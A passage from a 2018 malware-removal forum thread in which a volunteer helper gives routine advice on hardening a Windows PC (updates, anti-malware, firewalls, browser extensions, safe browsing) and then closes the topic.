Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it that makes it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits (and also 0-days) which is one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, Google Chrome, Mozilla Firefox, VLC Media Player, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like eF2jhaz.pngUCheck, eLDnJfI.pngSecuniaPSI and y5YE7At.pngHeimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.Anti-Virus

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).Anti-Malware, Anti-Exploit and Anti-Ransomware

Having a decent security setup (which also includes an Antivirus) is the most crucial step to protect a system. These programs are additional layers of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Fortunately, the new Malwarebytes 3 bundle all these layers in one, easy to use and efficient product. Malwarebytes 3 offers Malware, Web, Exploit and Ransomware protection modules that works together in order to keep your system protected and stop an infection at multiple level.
  • j1Bynr2.pngMalwarebytes - Comes with a free trial of the Premium version for 14 days, after which it reverts back to the Free version
Note: Please note that only the Premium version of Malwarebytes 3 offers real-time protection (Malware, Web, Exploit and Ransomware). The free version only allows you to scan your system for threats and remove them.

Firewall

Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.
  • 7p3JzTS.pngGlassWire - Has both a free and paid version (with different packages)
  • MQIMh6k.pngWindows Firewall Control - Gives you more control over your Windows Firewall
  • 5RXGshU.pngTinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it
Web Browsers and Web Browsing

Web Browsers could be considered as the closest door between a malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means to install extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc. but also you at the same time. Here are a few extensions that I recommend you to install.
  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome, Mozilla Firefox, Microsoft Edge, Opera and most Chromium and Firefox-based browsers)
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera)
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browsers)
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers)
  • uMatrix: For advanced users, a point and click matrix-like extensions that allow you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera)
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser)
As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far less chances to get infected by a malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you to avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices :gRvSooB.pngThe End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you wont!), you can always comeback in this section to get another checkup with one of our trained malware removal member.

Do you have any questions before I close this thread? :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:32 PM

Posted 13 January 2018 - 10:43 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users